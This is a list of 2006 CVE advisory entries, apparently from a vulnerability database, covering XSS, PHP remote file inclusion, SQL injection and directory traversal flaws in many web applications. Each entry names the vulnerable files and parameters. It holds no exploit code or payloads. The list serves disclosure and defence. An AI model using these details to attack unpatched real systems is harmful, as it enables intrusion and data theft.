[CVE-2006-5101] PHP remote file inclusion vulnerability in include.php in Comdev CSV Importer 3.1 and possibly 4.1, as used in (1) Comdev Contact Form 3.1, (2) Comdev Customer Helpdesk 3.1, (3) Comdev Events Calendar 3.1, (4) Comdev FAQ Support 3.1, (5) Comdev Guestbook 3.1, (6) Comdev Links Directory 3.1, (7) Comdev News Publisher 3.1, (8) Comdev Newsletter 3.1, (9) Comdev Photo Gallery 3.1, (10) Comdev Vote Caster 3.1, (11) Comdev Web Blogger 3.1, and (12) Comdev eCommerce 3.1, allows remote attackers to execute arbitrary PHP code via a URL in the path[docroot] parameter. NOTE: it has been reported that 4.1 versions might also be affected.
[CVE-2006-5100] PHP remote file inclusion vulnerability in parse/parser.php in WEB//NEWS (aka webnews) 1.4 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the WN_BASEDIR parameter.
[CVE-2006-5096] Multiple cross-site scripting (XSS) vulnerabilities in index.php in VirtueMart (formerly known as mambo-phpShop) Joomla! eCommerce Edition CMS 1.0.11, and possibly earlier, allow remote attackers to inject arbitrary web script or HTML via the Itemid parameter in a (1) com_contact or (2) subscribe action.
[CVE-2006-5090] Multiple cross-site scripting (XSS) vulnerabilities in Phoenix Evolution CMS (PECMS) allow remote attackers to inject arbitrary web script or HTML via the (1) mod or (2) action parameters in index.php, or the (3) pageid parameter in modules/pageedit/index.php. NOTE: the provenance of this information is unknown
[CVE-2006-5080] Cross-site scripting (XSS) vulnerability in the search function in Six Apart Movable Type 3.3 to 3.32, and Movable Type Enterprise 1.01 and 1.02, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2006-5074] Cross-site scripting (XSS) vulnerability in home.php in PHP Invoice 2.2 allows remote attackers to inject arbitrary web script or HTML via the alert parameter.
[CVE-2006-5071] Multiple cross-site scripting (XSS) vulnerabilities in eyeOS before 0.9.1 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors involving (1) eyeNav and (2) system/baixar.php.
[CVE-2006-5069] Cross-site scripting (XSS) vulnerability in class.tx_indexedsearch.php in the Indexed Search 2.9.0 extension for Typo3 before 4.0.2 and earlier allows remote attackers to inject arbitrary web script or HTML via the search parameter.
[CVE-2006-5066] Multiple cross-site scripting (XSS) vulnerabilities in DanPHPSupport 0.5, and other versions before 1.0, allow remote attackers to inject arbitrary web script or HTML via the (1) page parameter in index.php or the (2) do parameter in admin.php.
[CVE-2006-5064] Multiple cross-site scripting (XSS) vulnerabilities in BirdBlog 1.4 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) entryid parameter in comment.php, (2) page parameter in index.php, or the (3) uid parameter in user.php. NOTE: the provenance of this information is unknown
[CVE-2006-5063] Cross-site scripting (XSS) vulnerability in Elog 2.6.1 allows remote attackers to inject arbitrary web script or HTML by editing log entries in HTML mode.
[CVE-2006-5060] Cross-site scripting (XSS) vulnerability in login.php in Jamroom 3.0.16 and possibly earlier allows remote attackers to inject arbitrary web script or HTML via the forgot parameter in the forgot mode.
[CVE-2006-5059] Multiple cross-site scripting (XSS) vulnerabilities in WWWthreads 5.4.2 and earlier allow remote attackers to inject arbitrary web script or HTML via the Cat parameter to (1) dosearch.php, (2) postlist.php, (3) showmembers.php, (4) faq_english.php, (5) online.php, (6) login.php, (7) newuser.php, (8) wwwthreads.php, (9) search.php, or (10) postlist.php.
[CVE-2006-5057] Multiple cross-site scripting (XSS) vulnerabilities in Ktools.net PhotoStore allow remote attackers to inject arbitrary web script or HTML via the (1) gid parameter in details.php, or the (2) photogid parameter in view_photog.php.
[CVE-2006-5056] Cross-site scripting (XSS) vulnerability in index.php in Opial Audio/Video Download Management 1.0 allows remote attackers to inject arbitrary web script or HTML via the destination parameter in the Login view.
[CVE-2006-5053] PHP remote file inclusion vulnerability in webnews/template.php in Web-News 1.6.3 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the content_page parameter.
[CVE-2006-5035] Multiple cross-site scripting (XSS) vulnerabilities in Paul Smith Computer Services vCAP 1.7.0 allow remote attackers to inject arbitrary web script or HTML via (1) the statusmsg parameter in RegisterPage.cgi or (2) a URI corresponding to a nonexistent file. NOTE: the provenance of this information is unknown
[CVE-2006-5031] Directory traversal vulnerability in app/webroot/js/vendors.php in Cake Software Foundation CakePHP before 1.1.8.3544 allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter, followed by a filename ending with "%00" and a .js filename.
[CVE-2006-5023] SQL injection vulnerability in kategori.asp in xweblog 2.1 and earlier allows remote attackers to execute arbitrary SQL commands via the kategori parameter.
[CVE-2006-5020] Multiple PHP remote file inclusion vulnerabilities in SolidState 0.4 and earlier allow remote attackers to execute arbitrary PHP code via a URL in the base_path parameter in manager/pages/ scripts including (1) AccountsPage.class.php, (2) AddInvoicePage.class.php, (3) AddIPAddressPage.class.php, (4) AddPaymentPage.class.php, (5) AddTaxRulePage.class.php, (6) AssignDomainPage.class.php, (7) AssignHostingPage.class.php, (8) AssignProductPage.class.php, (9) BillingPage.class.php, (10) BillingPaymentPage.class.php, (11) BrowseAccountsPage.class.php, (12) BrowseInvoicesPage.class.php, (13) ConfigureEditUserPage.class.php, (14) ConfigureNewUserPage.class.php, (15) ConfigureNewUserReceiptPage.class.php, (16) ConfigureUsersPage.class.php, (17) DeleteAccountPage.class.php, (18) DeleteDomainServicePage.class.php, (19) DeleteHostingServicePage.class.php, (20) DeleteInvoicePage.class.php, (21) DeleteProductPage.class.php, (22) DeleteServerPage.class.php, (23) DomainServicesPage.class.php, (24) DomainsPage.class.php, (25) EditAccountPage.class.php, (26) EditDomainPage.class.php, (27) EditDomainServicePage.class.php, (28) EditHostingServicePage.class.php, (29) EditPaymentPage.class.php, (30) EditProductPage.class.php, (31) EditServerPage.class.php, (32) EmailInvoicePage.class.php, (33) ExecuteOrderPage.class.php, (34) ExpiredDomainsPage.class.php, (35) FulfilledOrdersPage.class.php, (36) GenerateInvoicesPage.class.php, (37) HomePage.class.php, (38) InactiveAccountsPage.class.php, (39) IPManagerPage.class.php, (40) LoginPage.class.php, (41) LogPage.class.php, (42) ModulesPage.class.php, (43) NewAccountPage.class.php, (44) NewDomainServicePage.class.php, (45) NewProductPage.class.php, (46) OutstandingInvoicesPage.class.php, (47) PendingAccountsPage.class.php, (48) PendingOrdersPage.class.php, (49) PrintInvoicePage.class.php, (50) ProductsPage.class.php, (51) RegisterDomainPage.class.php, (52) RegisteredDomainsPage.class.php, (53) ServersPage.class.php, (54) ServicesHostingServicesPage.class.php, (55) ServicesNewHostingPage.class.php, (56) ServicesPage.class.php, (57) ServicesWebHostingPage.class.php, (58) SettingsPage.class.php, (59) TaxesPage.class.php, (60) TransferDomainPage.class.php, (61) ViewAccountPage.class.php, (62) ViewDomainServicePage.class.php, (63) ViewHostingServicePage.class.php, (64) ViewInvoicePage.class.php, (65) ViewLogMessagePage.class.php, (66) ViewOrderPage.class.php, (67) ViewProductPage.class.php, (68) ViewServerPage.class.php, (69) WelcomeEmailPage.class.php
[CVE-2006-4988] Multiple cross-site scripting (XSS) vulnerabilities in Patrick Michaelis Wili-CMS allow remote attackers to inject arbitrary web script or HTML via (1) the query string to relocate.php, (2) the globals[pageid] parameter in example-view/inc/print_button.php, and other unspecified vectors.
[CVE-2006-4985] Multiple cross-site scripting (XSS) vulnerabilities in Grayscale BandSite CMS allow remote attackers to inject arbitrary web script or HTML via (1) the max_file_size_purdy parameter in adminpanel/includes/helpfiles/help_mp3.php, (2) the message_text parameter in adminpanel/includes/mailinglist/sendemail.php, (3) the this_year parameter in includes/footer.php, and the band parameter in (4) adminpanel/includes/helpfiles/help_news.php (5) adminpanel/includes/helpfiles/help_merch.php, (6) adminpanel/includes/header.php, and (7) adminpanel/login_header.php
[CVE-2006-4975] Yahoo! Messenger for WAP permits saving messages that contain JavaScript, which allows user-assisted remote attackers to inject arbitrary web script or HTML via a URL at the online service.
[CVE-2006-4972] Cross-site scripting (XSS) vulnerability in archive/index.php/forum-4.html in MyBB (aka MyBulletinBoard) allows remote attackers to inject arbitrary web script or HTML via the navbits[][name] parameter.
[CVE-2006-4969] Multiple PHP remote file inclusion vulnerabilities in WAHM E-Commerce Pie Cart Pro allow remote attackers to execute arbitrary PHP code via a URL in the Inc_Dir parameter in (1) affiliates.php, (2) orders.php, (3) events.php, (4) index.php, (5) articles.php, (6) faqs.php, (7) guestbook.php, (8) catalog.php, (9) wholesale.php, (10) weblinks.php, (11) certificates.php, (12) sitesearch.php, (13) contact.php, (14) sitemap.php, (15) search.php, (16) registry.php, or (17) error.php.
[CVE-2006-4967] Multiple cross-site scripting (XSS) vulnerabilities in NextAge Cart allow remote attackers to inject arbitrary web script or HTML via (1) the CatId parameter in a product category action in index.php or (2) the SearchWd parameter in an index search action in index.php.
[CVE-2006-4965] Apple QuickTime 7.1.3 Player and Plug-In allows remote attackers to execute arbitrary JavaScript code and possibly conduct other attacks via a QuickTime Media Link (QTL) file with an embed XML element and a qtnext parameter that identifies resources outside of the original domain. NOTE: as of 20070912, this issue has been demonstrated by using instances of Components.interfaces.nsILocalFile and Components.interfaces.nsIProcess to execute arbitrary local files within Firefox and possibly Internet Explorer.
[CVE-2006-4964] Cross-site scripting (XSS) vulnerability in MAXdev MDPro 1.0.76 before 20060918 allows remote attackers to inject arbitrary web script or HTML via (1) vectors that bypass the XSS protection mechanisms of the pnVarCleanFromInput function, and (2) unspecified vectors related to the AntiCracker.
[CVE-2006-4960] Cross-site scripting (XSS) vulnerability in index.php in Php Blue Dragon 2.9.1 and earlier allows remote attackers to inject arbitrary web script or HTML via the m parameter, which is reflected in an error message resulting from a failed SQL query.
[CVE-2006-4959] Sun Secure Global Desktop (SSGD, aka Tarantella) before 4.3 allows remote attackers to obtain sensitive information, including hostnames, versions, and settings details, via unspecified vectors, possibly involving (1) taarchives.cgi, (2) ttaAuthentication.jsp, (3) ttalicense.cgi, (4) ttawlogin.cgi, (5) ttawebtop.cgi, (6) ttaabout.cgi, or (7) test-cgi. NOTE: This information is based upon a vague initial disclosure. Details will be updated as they become available.
[CVE-2006-4958] Multiple cross-site scripting (XSS) vulnerabilities in Sun Secure Global Desktop (SSGD, aka Tarantella) before 4.20.983 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors, possibly involving (1) taarchives.cgi, (2) ttaAuthentication.jsp, (3) ttalicense.cgi, (4) ttawlogin.cgi, (5) ttawebtop.cgi, (6) ttaabout.cgi, or (7) test-cgi. NOTE: This information is based upon a vague initial disclosure. Details will be updated as they become available.
[CVE-2006-4956] Cross-site scripting (XSS) vulnerability in the updateuser servlet in Neon WebMail for Java before 5.08 allows remote attackers to inject arbitrary web script or HTML via the in_name parameter, as used by the Name field.
[CVE-2006-4955] Directory traversal vulnerability in the downloadfile servlet in Neon WebMail for Java before 5.08 allows remote attackers to read arbitrary files via a .. (dot dot) sequence in the (1) savefolder and (2) savefilename parameters.
[CVE-2006-4954] The updateuser servlet in Neon WebMail for Java before 5.08 does not validate the in_id parameter, which allows remote attackers to modify information of arbitrary users, as demonstrated by modifying (1) passwords and (2) permissions, (3) viewing profile settings, and (4) creating and (5) deleting users.
[CVE-2006-4953] Multiple SQL injection vulnerabilities in Neon WebMail for Java before 5.08 allow remote attackers to execute arbitrary SQL commands via the (1) adr_sortkey and (2) adr_sortkey_desc parameters in the (a) addrlist servlet, and the (3) sortkey and (4) sortkey_desc parameters in the (b) maillist servlet.
[CVE-2006-4952] The updatemail servlet in Neon WebMail for Java before 5.08 allows remote attackers to move e-mail messages of arbitrary users between different mail folders, specified by the folderid and tofolderid parameters, via the ID parameter.
[CVE-2006-4951] Neon WebMail for Java before 5.08 allows remote attackers to execute arbitrary Java (JSP) code by sending an e-mail message with a JSP file attachment, which is stored under the web root with a predictable filename.
[CVE-2006-4949] Cross-site scripting (XSS) vulnerability in the Drupal 4.6 Site Profile Directory (profile_pages.module) before 1.1.2.1 and the Drupal 4.7 Site Profile Directory (profile_pages.module) before 1.2.2.1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors related to "lack of validation on output," possibly in the name and title parameters.
[CVE-2006-4947] Cross-site scripting (XSS) vulnerability in the Drupal 4.7 Search Keywords module before 1.15 2006/09/15 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors related to "lack of validation on output."
[CVE-2006-4946] PHP remote file inclusion vulnerability in include/startup.inc.php in CMSDevelopment Business Card Web Builder (BCWB) 0.99, and possibly 2.5 Beta and earlier, allows remote attackers to execute arbitrary PHP code via a URL in the root_path parameter.
[CVE-2006-4945] Multiple PHP remote file inclusion vulnerabilities in Cardway (aka Frederic Boudaud) DigitalWebShop 1.128 and earlier allow remote attackers to execute arbitrary PHP code via a URL in the _PHPLIB[libdir] parameter to (1) rechnung.php or (2) prepend.php.
[CVE-2006-4941] Multiple cross-site scripting (XSS) vulnerabilities in Moodle before 1.6.2 might allow remote attackers to inject arbitrary web script or HTML via (1) the choose parameter in files/index.php and (2) the sub parameter in doc/index.php.
[CVE-2006-4923] Cross-site scripting (XSS) vulnerability in search.php in eSyndiCat Portal System allows remote attackers to inject arbitrary web script or HTML via the what parameter.
[CVE-2006-4917] Cross-site scripting (XSS) vulnerability in search.php in PT News 1.7.8 allows remote attackers to inject arbitrary web script or HTML via the pgname parameter.
[CVE-2006-4915] Cross-site scripting (XSS) vulnerability in index.php in Innovate Portal 2.0 allows remote attackers to inject arbitrary web script or HTML via the content parameter.
[CVE-2006-4909] Cross-site scripting (XSS) vulnerability in Cisco Guard DDoS Mitigation Appliance before 5.1(6), when anti-spoofing is enabled, allows remote attackers to inject arbitrary web script or HTML via certain character sequences in a URL that are not properly handled when the appliance sends a meta-refresh.
[CVE-2006-4907] OSU 3.11alpha and 3.10a allows remote attackers to obtain sensitive information via a URL to a non-existent file, which displays the web root path in the resulting error message.
[CVE-2006-4899] The ePPIServlet script in Computer Associates (CA) eTrust Security Command Center 1.0 and r8 up to SP1 CR2, when running on Windows, allows remote attackers to obtain the web server path via a "'" (single quote) in the PIProfile function, which leaks the path in an error message.
[CVE-2006-4897] CMtextS 1.0 and earlier stores users_logins/admin.txt under the web document root with insufficient access control, which allows remote attackers to obtain the administrator password.
[CVE-2006-4894] Cross-site scripting (XSS) vulnerability in forms/lostpassword.php in iDevSpot NixieAffiliate 1.9 and earlier allows remote attackers to inject arbitrary web script or HTML via the error parameter.
[CVE-2006-4886] The VirusScan On-Access Scan component in McAfee VirusScan Enterprise 7.1.0 and Scan Engine 4.4.00 allows local privileged users to bypass security restrictions and disable the On-Access Scan option by opening the program via the task bar and quickly clicking the Disable button, possibly due to an interface-related race condition.
[CVE-2006-4884] Multiple cross-site scripting (XSS) vulnerabilities in IDevSpot iSupport 1.8 allow remote attackers to inject arbitrary web script or HTML via (1) the suser parameter in support/rightbar.php, (2) the ticket_id parameter in support/open_tickets.php, and (3) the cons_page_title parameter in index.php. NOTE: the provenance of this information is unknown.
[CVE-2006-4883] Multiple cross-site scripting (XSS) vulnerabilities in IDevSpot BizDirectory allow remote attackers to inject arbitrary web script or HTML via (1) the stylesheet parameter in Feed.php or (2) the message parameter in status.php.
[CVE-2006-4881] Multiple cross-site scripting (XSS) vulnerabilities in David Bennett PHP-Post (PHPp) 1.0 and earlier allow remote attackers to inject arbitrary web script or HTML via (1) the replyuser parameter in (a) pm.php
[CVE-2006-4874] Multiple cross-site scripting (XSS) vulnerabilities in Jupiter CMS allow remote attackers to inject arbitrary web script or HTML via the (1) language[Admin name] and (2) language[Admin back] parameters in (a) modules/blocks.php
[CVE-2006-4856] Multiple cross-site scripting (XSS) vulnerabilities in Roller WebLogger 2.3 allow remote attackers to inject arbitrary web script or HTML via the (1) name, (2) email, or (3) url parameters
[CVE-2006-4848] ** DISPUTED ** Multiple PHP remote file inclusion vulnerabilities in Brian Fraval Hitweb 3.0 allow remote attackers to execute arbitrary PHP code via a URL in the REP_CLASS parameter to (1) index.php, (2) arbo.php, (3) framepoint.php, (4) genpage.php, (5) lienvalider.php, (6) appreciation.php, (7) partenariat.php, (8) rechercher.php, (9) projet.php, (10) propoexample.php, (11) refererpoint.php, or (12) top50.php. NOTE: this issue has been disputed by a third party researcher, stating that REP_CLASS is initialized in an included file before being used.
[CVE-2006-4843] Cross-site scripting (XSS) vulnerability in the Active Content Filter feature in IBM Lotus Domino before 6.5.6 and 7.x before 7.0.2 FP1 allows remote attackers to inject arbitrary web script or HTML via unspecified "code sequences" that bypass the protection scheme.
[CVE-2006-4838] Multiple cross-site scripting (XSS) vulnerabilities in DCP-Portal SE 6.0 allow remote attackers to inject arbitrary web script or HTML via the (1) root_url and (2) dcp_version parameters in (a) admin/inc/footer.inc.php, and the root_url, (3) page_top_name, (4) page_name, and (5) page_options parameters in (b) admin/inc/header.inc.php.
[CVE-2006-4829] Multiple cross-site scripting (XSS) vulnerabilities in David Czarnecki Blojsom 2.31 allow remote attackers to inject arbitrary web script or HTML via the (1) blog-category-description, (2) blog-entry-title, (3) rss-enclosure-url, (4) technorati-tagsi, or (5) blog-category-name parameter in a blog post.
[CVE-2006-4825] Multiple cross-site scripting (XSS) vulnerabilities in cl_files/index.php in SoftComplex PHP Event Calendar 1.5.1, and possibly earlier, allow remote attackers to inject arbitrary web script or HTML via the (1) ti, (2) bi, or (3) cbgi parameters.
[CVE-2006-4822] Multiple cross-site scripting (XSS) vulnerabilities in index.php in eMuSOFT emuCMS 0.3 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) query or (2) page parameters.
[CVE-2006-4821] Cross-site scripting (XSS) vulnerability in the Drupal 4.7 Userreview module before 1.19 2006/09/12 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2006-4797] Cross-site scripting (XSS) vulnerability in tag.php in CloudNine Interactive CJ Tag Board 3.0 allows remote attackers to inject arbitrary web script or HTML via a JavaScript event in a url BBcode tag in the cjmsg parameter.
[CVE-2006-4796] Cross-site scripting (XSS) vulnerability in forum.asp in Snitz Forums 2000 3.4.06 allows remote attackers to inject arbitrary web script or HTML via the sortorder parameter (strtopicsortord variable).
[CVE-2006-4794] Multiple cross-site scripting (XSS) vulnerabilities in e107 0.7.5 allow remote attackers to inject arbitrary web script or HTML via the query string (PATH_INFO) in (1) contact.php, (2) download.php, (3) admin.php, (4) fpw.php, (5) news.php, (6) search.php, (7) signup.php, (8) submitnews.php, and (9) user.php. NOTE: the provenance of this information is unknown.
[CVE-2006-4784] Multiple cross-site scripting (XSS) vulnerabilities in Moodle 1.6.1 and earlier might allow remote attackers to inject arbitrary web script or HTML via unspecified parameters to (1) doc/index.php or (2) files/index.php.
[CVE-2006-4783] SQL injection vulnerability in squads.php in WebSPELL 4.01.01 and earlier, when register_globals is enabled, allows remote attackers to execute arbitrary SQL commands via the squadID parameter.
[CVE-2006-4782] src/index.php in WebSPELL 4.01.01 and earlier, when register_globals is enabled, allows remote attackers to bypass authentication and gain sensitive information stored in the database via a modified userID parameter in a write action to admin/database.php.
[CVE-2006-4772] HotPlug CMS stores sensitive information under the web root with insufficient access control, which allows remote attackers to read the admin password and database credentials via a direct request for includes/class/config.inc.
[CVE-2006-4771] Cross-site scripting (XSS) vulnerability in haut.php in ForumJBC 4 allows remote attackers to inject arbitrary web script or HTML via the nb_connecte parameter.
[CVE-2006-4763] IBM Lotus Domino Web Access (DWA) 7.0.1 does not expire a client's Lightweight Third-Party Authentication token (LtpaToken) upon logout, which allows remote attackers to obtain a user's privileges by intercepting the LtpaToken cookie.
[CVE-2006-4762] Multiple cross-site scripting (XSS) vulnerabilities in Ykoon RssReader allow remote attackers to inject arbitrary web script or HTML via a web feed, as demonstrated by certain test cases of the Robert Auger and Caleb Sima RSS and Atom feed reader test suite.
[CVE-2006-4761] Multiple cross-site scripting (XSS) vulnerabilities in Luke Hutteman SharpReader allow remote attackers to inject arbitrary web script or HTML via a web feed, as demonstrated by certain test cases of the Robert Auger and Caleb Sima RSS and Atom feed reader test suite.
[CVE-2006-4760] Multiple cross-site scripting (XSS) vulnerabilities in Benjamin Pasero and Tobias Eichert RSSOwl allow remote attackers to inject arbitrary web script or HTML via a web feed, as demonstrated by certain test cases of the Robert Auger and Caleb Sima RSS and Atom feed reader test suite.
[CVE-2006-4755] Cross-site scripting (XSS) vulnerability in alpha.php in phpMyDirectory 10.4.6 and earlier allows remote attackers to inject arbitrary web script or HTML via the letter parameter. NOTE: the provenance of this information is unknown.
[CVE-2006-4754] Cross-site scripting (XSS) vulnerability in index.php in PHProg before 1.1 allows remote attackers to inject arbitrary web script or HTML via the album parameter, which is used in an opendir call. NOTE: the same primary issue can be used for full path disclosure with an invalid parameter that reveals the installation path in an error message.
[CVE-2006-4751] Cross-site scripting (XSS) vulnerability in index.php in Laurentiu Matei eXpandable Home Page (XHP) CMS 0.5.1 allows remote attackers to inject arbitrary web script or HTML via the errcode parameter.
[CVE-2006-4747] Multiple cross-site scripting (XSS) vulnerabilities in IdevSpot TextAds allow remote attackers to inject arbitrary web script or HTML via (1) the id parameter in delete.php and (2) the error parameter in error.php.
[CVE-2006-4746] PHP remote file inclusion vulnerability in news/include/customize.php in Web Server Creator 0.1 allows remote attackers to execute arbitrary PHP code via a URL in the l parameter.
[CVE-2006-4742] Cross-site scripting (XSS) vulnerability in user_add.php in IDevSpot PhpLinkExchange 1.0 allows remote attackers to inject arbitrary web script or HTML via the msg parameter.
[CVE-2006-4739] Multiple cross-site scripting (XSS) vulnerabilities in Jetbox CMS allow remote attackers to inject arbitrary web script or HTML, as demonstrated via the OriginalImageData parameter to phpthumb.php.
[CVE-2006-4737] SQL injection vulnerability in index.php in Jetbox CMS allows remote attackers to inject arbitrary web script or HTML via the item parameter. NOTE: The view vector is already covered by CVE-2006-3586.2.
[CVE-2006-4733] PHP remote file inclusion vulnerability in sipssys/code/box.inc.php in Haakon Nilsen simple, integrated publishing system (SIPS) 0.3.1 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the config[sipssys] parameter. NOTE: the product's documentation recommends placing the affected file outside of the web root, so the scope of the issue is limited to admins who do not, or cannot, follow this recommendation.
[CVE-2006-4727] Cross-site scripting (XSS) vulnerability in emfadmin/statusView.do in Tumbleweed EMF Administration Module 6.2.2 Build 4123, and possibly other versions before 6.3.2, allows remote attackers to inject arbitrary web script or HTML via the (1) lineId and (2) sort parameters.
[CVE-2006-4726] Cross-site scripting (XSS) vulnerability in Adobe ColdFusion MX 6.1 through 7.02 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors involving a ColdFusion error page.
[CVE-2006-4723] PHP remote file inclusion vulnerability in raidenhttpd-admin/slice/check.php in RaidenHTTPD 1.1.49, when register_globals and WebAdmin is enabled, allows remote attackers to execute arbitrary PHP code via a URL in the SoftParserFileXml parameter.
[CVE-2006-4719] Multiple PHP remote file inclusion vulnerabilities in MyABraCaDaWeb 1.0.3, when register_globals is enabled, allow remote attackers to execute arbitrary PHP code via a URL in the base parameter to (1) index.php or (2) pop.php.
[CVE-2006-4718] Multiple cross-site scripting (XSS) vulnerabilities in livre_or.php in KorviBlog 1.3.0 allow remote attackers to inject arbitrary web script or HTML via the (1) prenom, (2) emailFrom, or (3) body parameters.
[CVE-2006-4712] Multiple cross-site scripting (XSS) vulnerabilities in Sage 1.3.6 allow remote attackers to inject arbitrary web script or HTML via JavaScript in a content:encoded element within an item element in an RSS feed, as demonstrated by four example content:encoded elements that use XMLHttpRequest to read arbitrary local files, aka "Cross Context Scripting."
[CVE-2006-4711] Multiple cross-site scripting (XSS) vulnerabilities in Sage allow remote attackers to inject arbitrary web script or HTML via an Atom 1.0 feed, as demonstrated by certain test cases of the James M. Snell Atom 1.0 feed reader test suite.
[CVE-2006-4710] Multiple cross-site scripting (XSS) vulnerabilities in NewsGator FeedDemon before 2.0.0.25 allow remote attackers to inject arbitrary web script or HTML via an Atom 1.0 feed, as demonstrated by certain test cases of the James M. Snell Atom 1.0 feed reader test suite.
[CVE-2006-4708] Multiple cross-site scripting (XSS) vulnerabilities in Vikingboard 0.1b allow remote attackers to inject arbitrary web script or HTML via the (1) act parameter in (a) help.php and (b) search.php, and the (2) p parameter in report.php.
[CVE-2006-4707] Cross-site scripting (XSS) vulnerability in admin/global.php (aka the Admin CP login form) in MyBB (aka MyBulletinBoard) 1.1.7 allows remote attackers to inject arbitrary web script or HTML via the query string ($_SERVER[PHP_SELF]).
[CVE-2006-4706] Cross-site scripting (XSS) vulnerability in inc/functions_post.php in MyBB (aka MyBulletinBoard) 1.1.7 allows remote attackers to inject arbitrary web script or HTML via a url BBCode tag that contains a javascript URI with an SGML numeric character reference and an embedded space, as demonstrated using "java& #115
[CVE-2006-4695] Unspecified vulnerability in certain COM objects in Microsoft Office Web Components 2000 allows user-assisted remote attackers to execute arbitrary code via a crafted URL, aka "Office Web Components URL Parsing Vulnerability."
[CVE-2006-4686] Buffer overflow in the Extensible Stylesheet Language Transformations (XSLT) processing in Microsoft XML Parser 2.6 and XML Core Services 3.0 through 6.0 allows remote attackers to execute arbitrary code via a crafted Web page.
[CVE-2006-4684] The docutils module in Zope (Zope2) 2.7.0 through 2.7.9 and 2.8.0 through 2.8.8 does not properly handle web pages with reStructuredText (reST) markup, which allows remote attackers to read arbitrary files via a csv_table directive, a different vulnerability than CVE-2006-3458.
[CVE-2006-4668] Cross-site scripting (XSS) vulnerability in index.php in Rob Hensley AckerTodo 4.0 allows remote attackers to inject arbitrary web script or HTML via the task_id parameter in an edit_task command.
[CVE-2006-4665] Cross-site scripting (XSS) vulnerability in index.php in MKPortal M1.1 Rc1 allows remote attackers to inject arbitrary web script or HTML via the ind parameter, possibly related to the PHP_SELF variable. NOTE: Some details are obtained from third party information.
[CVE-2006-4661] AOL ICQ Toolbar 1.3 for Internet Explorer (toolbaru.dll) does not properly validate the origin of the configuration web page (options2.html), which allows user-assisted remote attackers to provide a web page that contains disguised checkboxes that trick the user into reconfiguring the toolbar.
[CVE-2006-4659] The Panda Platinum Internet Security 2006 10.02.01 and 2007 11.00.00 uses predictable URLs for the spam classification of each message, which allows remote attackers to cause Panda to classify arbitrary messages as spam via a web page that contains IMG tags with the predictable URLs. NOTE: this issue could also be regarded as a cross-site request forgery (CSRF) vulnerability.
[CVE-2006-4657] Panda Platinum Internet Security 2006 10.02.01 and 2007 11.00.00 stores service executables under the product's installation directory with weak permissions, which allows local users to obtain LocalSystem privileges by modifying (1) WebProxy.exe or (2) PAVSRV51.EXE.
[CVE-2006-4656] PHP remote file inclusion vulnerability in admin/editeur/spaw_control.class.php in Web Provence SL_Site 1.0 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the spaw_root parameter. NOTE: CVE analysis suggests that this issue is actually in a third party product, SPAW Editor PHP Edition.
[CVE-2006-4654] Format string vulnerability in Easy Address Book Web Server 1.2 allows remote attackers to cause a denial of service (crash) or "compromise the server" via encoded format string specifiers in the query string.
[CVE-2006-4653] (1) Amazing Little Poll and (2) Amazing Little Picture Poll store sensitive information under the web root with insufficient access control, which allows remote attackers to read the admin password via a direct request for the lp_settings file (lp_settings.inc or lp_settings.php).
[CVE-2006-4646] Cross-site scripting (XSS) vulnerability in the Drupal 4.7 Pathauto module before pathauto_node.inc 1.17.2.1 and the Drupal 4.6 Pathauto module before pathauto_node.inc 1.14.2.1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2006-4635] Unspecified vulnerability in MySource Classic 2.14.6, and possibly earlier, allows remote authenticated users, with superuser privileges, to inject arbitrary PHP code via unspecified vectors related to the Equation attribute in Web_Extensions - Notitia (I/II). NOTE: due to lack of details, it is not clear whether this issue is file inclusion, static code injection, or another type of issue.
[CVE-2006-4634] Cross-site scripting (XSS) vulnerability in index.php in VBZooM allows remote attackers to inject arbitrary web script or HTML via the UserID parameter, a different vector than CVE-2006-1133 and CVE-2005-2441.
[CVE-2006-4628] Cross-site scripting (XSS) vulnerability in VCD-db before 0.983 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors when handling comments.
[CVE-2006-4620] The useredit_account.wdm module in Alt-N WebAdmin 3.2.5 running with MDaemon 9.0.6, and possibly earlier versions, allows remote authenticated domain administrators to gain privileges and obtain access to the system mail queue by modifying the mailbox of the MDaemon user account to use the mailbox of another account.
[CVE-2006-4608] Multiple cross-site scripting (XSS) vulnerabilities in Longino Jacome php-Revista 1.1.2 allow remote attackers to inject arbitrary web script or HTML via the (1) cadena parameter in busqueda.php and the (2) email parameter in lista.php.
[CVE-2006-4603] NCH Swift Sound Web Dictate 1.02 allows remote attackers to bypass authentication via a null password.
[CVE-2006-4595] muforum (µforum) 0.4c stores membres/members.dat under the web document root with insufficient access control, which allows remote attackers to obtain sensitive information such as usernames and password hashes.
[CVE-2006-4593] Cross-site scripting (XSS) vulnerability in index.php in SoftBB 0.1 and earlier allows remote attackers to inject arbitrary web script or HTML via the page parameter.
[CVE-2006-4587] Multiple cross-site scripting (XSS) vulnerabilities in vtiger CRM 4.2.4, and possibly earlier, allow remote attackers to inject arbitrary web script or HTML via the (1) description parameter in unspecified modules or the (2) solution parameter in the HelpDesk module.
[CVE-2006-4577] Multiple cross-site scripting (XSS) vulnerabilities in The Address Book 1.04e allow remote attackers to inject arbitrary web script or HTML via Javascript events in the (1) email, (2) websites, and (3) groupAddName parameters in (a) save.php
[CVE-2006-4576] Cross-site scripting (XSS) vulnerability in The Address Book 1.04e allows remote attackers to inject arbitrary web script or HTML by uploading an HTML file with a GIF or JPG extension, which is rendered by Internet Explorer.
[CVE-2006-4563] Cross-site scripting (XSS) vulnerability in the MyHeadlines before 4.3.2 module for PHP-Nuke allows remote attackers to inject arbitrary web script or HTML via the myh_op parameter to modules.php.
